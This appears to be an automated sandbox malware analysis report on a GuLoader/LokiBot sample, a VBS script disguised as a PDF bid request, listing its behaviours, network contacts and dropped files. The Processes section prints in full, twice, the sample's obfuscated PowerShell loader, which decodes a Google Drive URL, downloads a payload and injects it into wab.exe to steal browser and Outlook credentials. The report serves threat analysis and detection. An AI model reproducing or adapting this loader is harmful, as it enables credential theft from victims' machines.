Malware Analysis Report

2024-11-30 23:44

Sample ID 240909-r3qleawbng
Target 56477d17f71d7e5912340580f96f8df535b19eb9cb96da14ccf741bcd465ee68
SHA256 56477d17f71d7e5912340580f96f8df535b19eb9cb96da14ccf741bcd465ee68
Tags
guloader collection credential_access discovery downloader execution stealer lokibot spyware trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

56477d17f71d7e5912340580f96f8df535b19eb9cb96da14ccf741bcd465ee68

Threat Level: Known bad

The file 56477d17f71d7e5912340580f96f8df535b19eb9cb96da14ccf741bcd465ee68 was found to be: Known bad.

Malicious Activity Summary

guloader collection credential_access discovery downloader execution stealer lokibot spyware trojan

Lokibot

Guloader,Cloudeye

Credentials from Password Stores: Credentials from Web Browsers

Blocklisted process makes network request

Checks computer location settings

Command and Scripting Interpreter: PowerShell

Accesses Microsoft Outlook profiles

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of SetThreadContext

System Location Discovery: System Language Discovery

Enumerates physical storage devices

outlook_win_path

outlook_office_path

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-09-09 14:43

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-09 14:43

Reported

2024-09-09 14:45

Platform

win7-20240903-en

Max time kernel

121s

Max time network

122s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\BID REQUEST 09-09-2024·pdf.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3012 set thread context of 1568 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2168 wrote to memory of 1804 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2168 wrote to memory of 1804 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2168 wrote to memory of 1804 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1804 wrote to memory of 2944 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1804 wrote to memory of 2944 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1804 wrote to memory of 2944 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1804 wrote to memory of 3012 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1804 wrote to memory of 3012 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1804 wrote to memory of 3012 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1804 wrote to memory of 3012 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 3028 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 3028 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 3028 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 3028 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 1568 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3012 wrote to memory of 1568 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3012 wrote to memory of 1568 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3012 wrote to memory of 1568 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3012 wrote to memory of 1568 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3012 wrote to memory of 1568 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\BID REQUEST 09-09-2024·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Sardellerne='flowerier';$Otocranial=${host}.Runspace;If ($Otocranial) {$Oompahed++;$Sardellerne+='lejemordere';$Laryngograph='su';$Sardellerne+='Undonkey';$Laryngograph+='bs';$Sardellerne+='Premodified';$Laryngograph+='tri';$Sardellerne+='Pornograph';$Laryngograph+='ng';};Function splenoid($Frysnings){$Chankings=$Frysnings.Length-$Oompahed;For( $Utaknemlighedernes=5;$Utaknemlighedernes -lt $Chankings;$Utaknemlighedernes+=6){$debasements+=$Frysnings.$Laryngograph.'Invoke'( $Utaknemlighedernes, $Oompahed);}$debasements;}function Respirableness($Recidivets){ & ($Demarkernes) ($Recidivets);}$Adaptionernes=splenoid ' SkraMAmicooDecalz NonciAntrolInf.nlTaygeaMult./Bla f5decen.Aroma0Indva M.xim(Se esW Xa.ti AllonUnmoddKapruoKontrwSubjusNoneg HurriN.atraT Efte Alist1A,iss0Ab.nd.,kabe0Regis;Panpi ChimlW RageiMonobnVar n6Melan4Thron;Merka D.cerxVasal6Calci4Bifro;De,in HopscrSierrvvasti:Light1Pr,sp2Maerk1 B,el.heala0Came,)Stnke L,parG StudeDropsc FatwkA.rocoKadmi/Enven2Barog0Reada1Livsl0Kvidi0Netop1Maski0Sp.ck1Nona. BlooF alki BurrrAfv,seLiberfDemisoUnquaxMe.us/Medic1Rekey2Bnken1Straf.Un ki0 Kon ';$Cincholoipon=splenoid ' TalbU Sa,rsLienoeEpithrQuiet-C,uldASalsig FunkeArkain U retBdean ';$dekodningerne=splenoid 'Mi,ichWaivetudskrtma.papNak osGalla:Eel,o/Mo il/ Ped,dStd.irTe peiHerinvGimpeeBaneg.MignogT.pisoSkrteoAktivgGrumml,lyaee,ecei.lawsucHawkio Recom slri/ Minuu bic cMi,li? F sceUnshuxGramppBedr.o DiscrGlisstAu,ok= NonddDepo oF,rbrw BasinhaslolAut coUncreaslidsdFyrpa&Vict.iCrusadFavnm=Beats1SubjuvMetri7 NonvaOrthoJAnh.l4HngetS SampHsvejsQ O,spyalfae8Ver,sh SvmmW,isiouForsteTubis2TegumeReumaBSheasF sndat PropKB ggeR ForbDUte,omMisidL UndiuFusioqApathlBveruUDruidHSjllaBIngloCQuin,H Midr ';$Lillefingers=splenoid 'Trans> No,e ';$Demarkernes=splenoid 'r dsaiB.sideRetrixAmori ';$Folmar61='Haartoppes';$Doctrinarian = splenoid ' CytoePrecocChaushalteroR.gir Fletk%Telefa Omnip FunkpQueendTournaBuddht CritaEx,ra%Mtaal\TreaaCI.ecoaPe,amrMuseubOverriPaagrnUdydeeSump.sS ump.MelleQHornfu,visleDekad Ch.c&Baja.& astl isave S,aac GlychLobbyoQ.adr Paatvtaaben ';Respirableness (splenoid 'Unhou$Uncolg D,molGasteoUudrybQuiniaUltralFa.ta:pacifO SkovpNontevMar.iiMountsJazzbnbeck.i VrdinBl,mrg fors=Overl( RecicPavilm knyrd Aleu Dovek/TrodscCochl Boggi$F iheDA ieroDolomc Regit afterUfejliatr,bnFyrreaPacker Fjeni ForsaSti,bnCan e) will ');Respirableness (splenoid 'c tra$ prjg Invil PrivoMellebKlepha Naphl djun:KighoMMich,aMo,teiPotshu naccsOrphr=,utcl$AsperdMimreeColo.kU.stuo BrysdOksehn sseri NegenG mmagg lvteGyromrUdsalnEffroeHusal.MosrosGennepLinjelPrintiReapptsemic(Lab,o$DunhaLKom eiUncrilRekorlVkstheNed.afAnsvaiArgennEsk dgmillseCeci,rPers,sPopul) Baro ');Respirableness (splenoid 'Kr,gs[SvensN Forge syn t Meun. PatrSAnklaeAnabrrUdsenvMilliiLgebgcA.seteWom nPKladdoTurrii Eks nOuvertPreflMgibina P etnPaah.aDomflgAfhsteS riarSerru] h,pt:.plif:Su coSUne,eeOpelscDriftuBooterAttitiPlesitWindoyStjgrPBrugtrRefaso.alantIs,leoMaa rcAnbajo Undil Salt Guzz =.igen Tromp[axolyN,ulfoeOxonotK.rrw.gangaSLexinePseudcAfteruCigarr SamliMod,etOphreydriftPMislir FahloG,ebntAgtsooheintcWiretoCrumhl Una TCottoy BilbpCo,taeAl.eh]mbelf:Koord:Inte T Arg,l BegisDeesc1Occas2Rodte ');$dekodningerne=$Maius[0];$Sporvognssljferne= (splenoid 'H,dje$Q ilag MnstlK.lpooSl tjbS,ineaNonnol akti:OlympNDrmmea ntert P,astClipteVskertge.iti UnmemBankne tithn K.ncs Jupo=LeptoN D,etePeasewDatal-SympaOOzonibSmurtjtildee RunkcBe,obtJ.ani Un,erS nkny SkuesDiptetLinjee SkudmDesul.Cu.icN.earbeK.mpetAmaz . Te,aW Begre .nhybPeppiCFibrolUnpreiHumaneStarvn Un,et');$Sporvognssljferne+=$Opvisning[1];Respirableness ($Sporvognssljferne);Respirableness (splenoid 'U.dgl$BugseNTiffiasecultPluddtSnakeeVe sdtOverhistrmsmMoyoreOverpnBlusesCh am.SofisHHidsieDeat a Nat,dgermie Subcr DrifsAwnsb[ Nort$polygCSkamsiEkspon KomecFiresh KafkoFlexulPre.roSvrmeiSilkepIsol,oC wshnMaa.b]Besty=Lykns$SkrslA,pecidT,pefaBushapelectt Whari TrihogriecnSkrive.karlrTraw.nIlioce FyrmsFaktu ');$theriatrics=splenoid 'En.ot$Tid bNsubl.aMedaktEf,ertSlette Recot Min iOve pmVaareeSta dnIndeksOblat.CorroD.undeoSpec,w EskanCha.ulOutlaoDiffeaD nerd IndbFRa.noi Dea.lHousee Prog( ille$OutspdMelleeForsbkKvlstokrydsdaffrinFa,thi FaminKlaphgHl rieVavatrVentenFina eSubor,.nsca$RespeT pre,esol nr odeorHypoxnO.natsTors.pTmredoLogarrDysmnt inds)serai ';$Terrnsport=$Opvisning[0];Respirableness (splenoid ' L.ly$Ubluvg,olveldiag.oOp.tabLeg taImmollStrmf:HeadwBMark.eRhynct ,atioSolstnDati,h ouchjApennt nilltReflea BygglBjergeManhar TppeeUnmar= Do,b(OkshoTAnt,feRgtersroyaltKjes,- ResgP Ma.eaUntittC,ffehDese Comp$ Sce T F.rfeAadserBetalrDrninngame.s EpippSvagso DougrDismotDiarr) G,tl ');while (!$Betonhjttalere) {Respirableness (splenoid '.vens$ ,pong HelulPsykooSchmab UdriaTlperl,fgru:Pu poB EnsclCedery Ddvga SalanGastrtAct ns Bl.btDespoeHorotgWeep,nC,nteiFals nc.dgegAn.toeSphenrSte,lsBunde1P,lar5Halvf8Fsteb=organ$Ve det RdstrBr,deuFuldgeSelvf ') ;Respirableness $theriatrics;Respirableness (splenoid ' gonaSWooletTrochaFi,hfr JametPortn-RimosSBoblel UndeeAutotePateepR,ngr Pa,fu4 Smaa ');Respirableness (splenoid 'Aquam$ vanggCaliflSyrinoPull.bStetiaNic.elUndut:SprogBTortue.vergtIsblooColomnCrot.h IniajRvertt P lat StueaStepslBurneeKume,rSu beePolli=Liqui( M.scTTronseUma ds abletcyke -NonemPTriataPhyl,tS,perhunves Pr,se$ fterTUnacceSeksurF emtrStveknGidsesAg.rhp Nonio Opspr Stumt Poss)Un nn ') ;Respirableness (splenoid 'Slgte$KursugUdrinltoccaoTaboob HoveaDimyalanne :BegaaCOvercaEarwiuIndskd DeklaS,hygd Opsl= Ambl$ PaafgvremalShelloFredsbAn,ryaFl.tal Evis:ElecaSNon,nkAlgr,iKemotfsemeitill.gnDittoiSolrinUd.ang.verde Anner .eha+.etal+ Blom% samm$hostiMForsraDiscoiStatsuDies sKeel .Liebhc Basso UndduRestinAmmontSnned ') ;$dekodningerne=$Maius[$Caudad];}$Nummererende=294536;$Supraliminally=29024;Respirableness (splenoid ' Batt$Orde gEnerglKadi oAnsigbVicara Ma,klUnser:B digS onopc ryserBekenuSk mab Enfrb DiffeProcrd G in sult.=Davyn Anar,GAfg.deTidsftA.lsn-M.eloCnone oPhlebnUntuctSubdueUn.onnFirsptP ill Jat $quantT,ikkeeFod ir jenerFilnunFortisSko epKo oroSt.kvrStrobtFyrre ');Respirableness (splenoid 'Udbr $ForulgSundhlBurglo Afspb Embea .fvelEdi h:,jhusWPiberiSkoletLe annPacoteDemeasRaa.asEmcumdJeka.o M.ssm Patr Anti.=Druel Danma[RangeSFir.oySn,lespuffit Noveeunowim Unh .aktieCPersooaksennKumbivMorale ,rthrSkytstKnapn]Bl ms: tris:ScantFMmetprContro BlitmPrmieBflyboaNazilsMarieePhleb6 Noct4traumSKuli.tSomatrRegi.iUnre nKredigEthic(Pat,r$E usiSSpo.scV.rderGene,uBrodkbLicanbBakkeeJeme,d Udsp)Sympa ');Respirableness (splenoid 'Passi$T,ndkg.alstlregeloCaddibBj,nca PreelLynne:BlindsUncomkBastaoUdspevLethelPlastbHaloge ForgrMartyh MultuKug,es.tilge.ssidnA,amoewryscsBo an Vergi=H ndu Fedt[HavreSTegn yKonvosAmonttTurcyeCharim Talj. S.orTJackpeOp.urxUrtidt gere.PseudEBibehn StatcEuskaoZ lpadTearpi.liffnFerskgTil.t]Info,:med.o:CircuAEl,veSAntagC afgiI Bj,eI ,onk.Skru GUngire.ullat odspSNe vutSci,nr MarliUnmaln,piksgHurti(opmun$Sc,usWVacc.iBlandtStilanOpsige Ne,us,anuasGtetpdOverco,ykedmPulte) ,ycl ');Respirableness (splenoid 'Tn,so$,ividgOmdi.lMethyostjkibPenitaUnenflFriki:G undA HaftfBandpp eburTeenav ji.se MeritHollu=tidss$FragisSe chk MuffoMeninvApartlconchb N.ndeMiljprCongihBiochuDunlisSkr.be RunwnHaymaeFontas Hoft.Bipa sMonocuDagtub,ackbss ogrtTransrSammei hersnstreggSejll(.egns$HjemvNAlko.uUfredmSubgwmIndfae Pia,rP pileUdtjerDiskeeAfasin Roardudtjee Revi,,yssa$Mis,eS Afsku Fly pReaktr Massa dvilcund iTaxammBost,iDigitnSlidsaOvergl allflPlastyLepid)Barke ');Respirableness $Afprvet;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Carbines.Que && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sardellerne='flowerier';$Otocranial=${host}.Runspace;If ($Otocranial) {$Oompahed++;$Sardellerne+='lejemordere';$Laryngograph='su';$Sardellerne+='Undonkey';$Laryngograph+='bs';$Sardellerne+='Premodified';$Laryngograph+='tri';$Sardellerne+='Pornograph';$Laryngograph+='ng';};Function splenoid($Frysnings){$Chankings=$Frysnings.Length-$Oompahed;For( $Utaknemlighedernes=5;$Utaknemlighedernes -lt $Chankings;$Utaknemlighedernes+=6){$debasements+=$Frysnings.$Laryngograph.'Invoke'( $Utaknemlighedernes, $Oompahed);}$debasements;}function Respirableness($Recidivets){ & ($Demarkernes) ($Recidivets);}$Adaptionernes=splenoid ' SkraMAmicooDecalz NonciAntrolInf.nlTaygeaMult./Bla f5decen.Aroma0Indva M.xim(Se esW Xa.ti AllonUnmoddKapruoKontrwSubjusNoneg HurriN.atraT Efte Alist1A,iss0Ab.nd.,kabe0Regis;Panpi ChimlW RageiMonobnVar n6Melan4Thron;Merka D.cerxVasal6Calci4Bifro;De,in HopscrSierrvvasti:Light1Pr,sp2Maerk1 B,el.heala0Came,)Stnke L,parG StudeDropsc FatwkA.rocoKadmi/Enven2Barog0Reada1Livsl0Kvidi0Netop1Maski0Sp.ck1Nona. BlooF alki BurrrAfv,seLiberfDemisoUnquaxMe.us/Medic1Rekey2Bnken1Straf.Un ki0 Kon ';$Cincholoipon=splenoid ' TalbU Sa,rsLienoeEpithrQuiet-C,uldASalsig FunkeArkain U retBdean ';$dekodningerne=splenoid 'Mi,ichWaivetudskrtma.papNak osGalla:Eel,o/Mo il/ Ped,dStd.irTe peiHerinvGimpeeBaneg.MignogT.pisoSkrteoAktivgGrumml,lyaee,ecei.lawsucHawkio Recom slri/ Minuu bic cMi,li? F sceUnshuxGramppBedr.o DiscrGlisstAu,ok= NonddDepo oF,rbrw BasinhaslolAut coUncreaslidsdFyrpa&Vict.iCrusadFavnm=Beats1SubjuvMetri7 NonvaOrthoJAnh.l4HngetS SampHsvejsQ O,spyalfae8Ver,sh SvmmW,isiouForsteTubis2TegumeReumaBSheasF sndat PropKB ggeR ForbDUte,omMisidL UndiuFusioqApathlBveruUDruidHSjllaBIngloCQuin,H Midr ';$Lillefingers=splenoid 'Trans> No,e ';$Demarkernes=splenoid 'r dsaiB.sideRetrixAmori ';$Folmar61='Haartoppes';$Doctrinarian = splenoid ' CytoePrecocChaushalteroR.gir Fletk%Telefa Omnip FunkpQueendTournaBuddht CritaEx,ra%Mtaal\TreaaCI.ecoaPe,amrMuseubOverriPaagrnUdydeeSump.sS ump.MelleQHornfu,visleDekad Ch.c&Baja.& astl isave S,aac GlychLobbyoQ.adr Paatvtaaben ';Respirableness (splenoid 'Unhou$Uncolg D,molGasteoUudrybQuiniaUltralFa.ta:pacifO SkovpNontevMar.iiMountsJazzbnbeck.i VrdinBl,mrg fors=Overl( RecicPavilm knyrd Aleu Dovek/TrodscCochl Boggi$F iheDA ieroDolomc Regit afterUfejliatr,bnFyrreaPacker Fjeni ForsaSti,bnCan e) will ');Respirableness (splenoid 'c tra$ prjg Invil PrivoMellebKlepha Naphl djun:KighoMMich,aMo,teiPotshu naccsOrphr=,utcl$AsperdMimreeColo.kU.stuo BrysdOksehn sseri NegenG mmagg lvteGyromrUdsalnEffroeHusal.MosrosGennepLinjelPrintiReapptsemic(Lab,o$DunhaLKom eiUncrilRekorlVkstheNed.afAnsvaiArgennEsk dgmillseCeci,rPers,sPopul) Baro ');Respirableness (splenoid 'Kr,gs[SvensN Forge syn t Meun. PatrSAnklaeAnabrrUdsenvMilliiLgebgcA.seteWom nPKladdoTurrii Eks nOuvertPreflMgibina P etnPaah.aDomflgAfhsteS riarSerru] h,pt:.plif:Su coSUne,eeOpelscDriftuBooterAttitiPlesitWindoyStjgrPBrugtrRefaso.alantIs,leoMaa rcAnbajo Undil Salt Guzz =.igen Tromp[axolyN,ulfoeOxonotK.rrw.gangaSLexinePseudcAfteruCigarr SamliMod,etOphreydriftPMislir FahloG,ebntAgtsooheintcWiretoCrumhl Una TCottoy BilbpCo,taeAl.eh]mbelf:Koord:Inte T Arg,l BegisDeesc1Occas2Rodte ');$dekodningerne=$Maius[0];$Sporvognssljferne= (splenoid 'H,dje$Q ilag MnstlK.lpooSl tjbS,ineaNonnol akti:OlympNDrmmea ntert P,astClipteVskertge.iti UnmemBankne tithn K.ncs Jupo=LeptoN D,etePeasewDatal-SympaOOzonibSmurtjtildee RunkcBe,obtJ.ani Un,erS nkny SkuesDiptetLinjee SkudmDesul.Cu.icN.earbeK.mpetAmaz . Te,aW Begre .nhybPeppiCFibrolUnpreiHumaneStarvn Un,et');$Sporvognssljferne+=$Opvisning[1];Respirableness ($Sporvognssljferne);Respirableness (splenoid 'U.dgl$BugseNTiffiasecultPluddtSnakeeVe sdtOverhistrmsmMoyoreOverpnBlusesCh am.SofisHHidsieDeat a Nat,dgermie Subcr DrifsAwnsb[ Nort$polygCSkamsiEkspon KomecFiresh KafkoFlexulPre.roSvrmeiSilkepIsol,oC wshnMaa.b]Besty=Lykns$SkrslA,pecidT,pefaBushapelectt Whari TrihogriecnSkrive.karlrTraw.nIlioce FyrmsFaktu ');$theriatrics=splenoid 'En.ot$Tid bNsubl.aMedaktEf,ertSlette Recot Min iOve pmVaareeSta dnIndeksOblat.CorroD.undeoSpec,w EskanCha.ulOutlaoDiffeaD nerd IndbFRa.noi Dea.lHousee Prog( ille$OutspdMelleeForsbkKvlstokrydsdaffrinFa,thi FaminKlaphgHl rieVavatrVentenFina eSubor,.nsca$RespeT pre,esol nr odeorHypoxnO.natsTors.pTmredoLogarrDysmnt inds)serai ';$Terrnsport=$Opvisning[0];Respirableness (splenoid ' L.ly$Ubluvg,olveldiag.oOp.tabLeg taImmollStrmf:HeadwBMark.eRhynct ,atioSolstnDati,h ouchjApennt nilltReflea BygglBjergeManhar TppeeUnmar= Do,b(OkshoTAnt,feRgtersroyaltKjes,- ResgP Ma.eaUntittC,ffehDese Comp$ Sce T F.rfeAadserBetalrDrninngame.s EpippSvagso DougrDismotDiarr) G,tl ');while (!$Betonhjttalere) {Respirableness (splenoid '.vens$ ,pong HelulPsykooSchmab UdriaTlperl,fgru:Pu poB EnsclCedery Ddvga SalanGastrtAct ns Bl.btDespoeHorotgWeep,nC,nteiFals nc.dgegAn.toeSphenrSte,lsBunde1P,lar5Halvf8Fsteb=organ$Ve det RdstrBr,deuFuldgeSelvf ') ;Respirableness $theriatrics;Respirableness (splenoid ' gonaSWooletTrochaFi,hfr JametPortn-RimosSBoblel UndeeAutotePateepR,ngr Pa,fu4 Smaa ');Respirableness (splenoid 'Aquam$ vanggCaliflSyrinoPull.bStetiaNic.elUndut:SprogBTortue.vergtIsblooColomnCrot.h IniajRvertt P lat StueaStepslBurneeKume,rSu beePolli=Liqui( M.scTTronseUma ds abletcyke -NonemPTriataPhyl,tS,perhunves Pr,se$ fterTUnacceSeksurF emtrStveknGidsesAg.rhp Nonio Opspr Stumt Poss)Un nn ') ;Respirableness (splenoid 'Slgte$KursugUdrinltoccaoTaboob HoveaDimyalanne :BegaaCOvercaEarwiuIndskd DeklaS,hygd Opsl= Ambl$ PaafgvremalShelloFredsbAn,ryaFl.tal Evis:ElecaSNon,nkAlgr,iKemotfsemeitill.gnDittoiSolrinUd.ang.verde Anner .eha+.etal+ Blom% samm$hostiMForsraDiscoiStatsuDies sKeel .Liebhc Basso UndduRestinAmmontSnned ') ;$dekodningerne=$Maius[$Caudad];}$Nummererende=294536;$Supraliminally=29024;Respirableness (splenoid ' Batt$Orde gEnerglKadi oAnsigbVicara Ma,klUnser:B digS onopc ryserBekenuSk mab Enfrb DiffeProcrd G in sult.=Davyn Anar,GAfg.deTidsftA.lsn-M.eloCnone oPhlebnUntuctSubdueUn.onnFirsptP ill Jat $quantT,ikkeeFod ir jenerFilnunFortisSko epKo oroSt.kvrStrobtFyrre ');Respirableness (splenoid 'Udbr $ForulgSundhlBurglo Afspb Embea .fvelEdi h:,jhusWPiberiSkoletLe annPacoteDemeasRaa.asEmcumdJeka.o M.ssm Patr Anti.=Druel Danma[RangeSFir.oySn,lespuffit Noveeunowim Unh .aktieCPersooaksennKumbivMorale ,rthrSkytstKnapn]Bl ms: tris:ScantFMmetprContro BlitmPrmieBflyboaNazilsMarieePhleb6 Noct4traumSKuli.tSomatrRegi.iUnre nKredigEthic(Pat,r$E usiSSpo.scV.rderGene,uBrodkbLicanbBakkeeJeme,d Udsp)Sympa ');Respirableness (splenoid 'Passi$T,ndkg.alstlregeloCaddibBj,nca PreelLynne:BlindsUncomkBastaoUdspevLethelPlastbHaloge ForgrMartyh MultuKug,es.tilge.ssidnA,amoewryscsBo an Vergi=H ndu Fedt[HavreSTegn yKonvosAmonttTurcyeCharim Talj. S.orTJackpeOp.urxUrtidt gere.PseudEBibehn StatcEuskaoZ lpadTearpi.liffnFerskgTil.t]Info,:med.o:CircuAEl,veSAntagC afgiI Bj,eI ,onk.Skru GUngire.ullat odspSNe vutSci,nr MarliUnmaln,piksgHurti(opmun$Sc,usWVacc.iBlandtStilanOpsige Ne,us,anuasGtetpdOverco,ykedmPulte) ,ycl ');Respirableness (splenoid 'Tn,so$,ividgOmdi.lMethyostjkibPenitaUnenflFriki:G undA HaftfBandpp eburTeenav ji.se MeritHollu=tidss$FragisSe chk MuffoMeninvApartlconchb N.ndeMiljprCongihBiochuDunlisSkr.be RunwnHaymaeFontas Hoft.Bipa sMonocuDagtub,ackbss ogrtTransrSammei hersnstreggSejll(.egns$HjemvNAlko.uUfredmSubgwmIndfae Pia,rP pileUdtjerDiskeeAfasin Roardudtjee Revi,,yssa$Mis,eS Afsku Fly pReaktr Massa dvilcund iTaxammBost,iDigitnSlidsaOvergl allflPlastyLepid)Barke ');Respirableness $Afprvet;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Carbines.Que && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
GB 216.58.201.110:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.179.225:443 drive.usercontent.google.com tcp
GB 216.58.201.110:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.179.227:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.179.227:80 o.pki.goog tcp
GB 142.250.179.225:443 drive.usercontent.google.com tcp
US 137.184.191.215:80 137.184.191.215 tcp

Files

C:\Users\Admin\AppData\Local\Temp\Cab81DF.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

memory/1804-20-0x000007FEF5E0E000-0x000007FEF5E0F000-memory.dmp

memory/1804-21-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

memory/1804-22-0x0000000002990000-0x0000000002998000-memory.dmp

memory/1804-23-0x000007FEF5B50000-0x000007FEF64ED000-memory.dmp

memory/1804-24-0x000007FEF5B50000-0x000007FEF64ED000-memory.dmp

memory/1804-25-0x000007FEF5B50000-0x000007FEF64ED000-memory.dmp

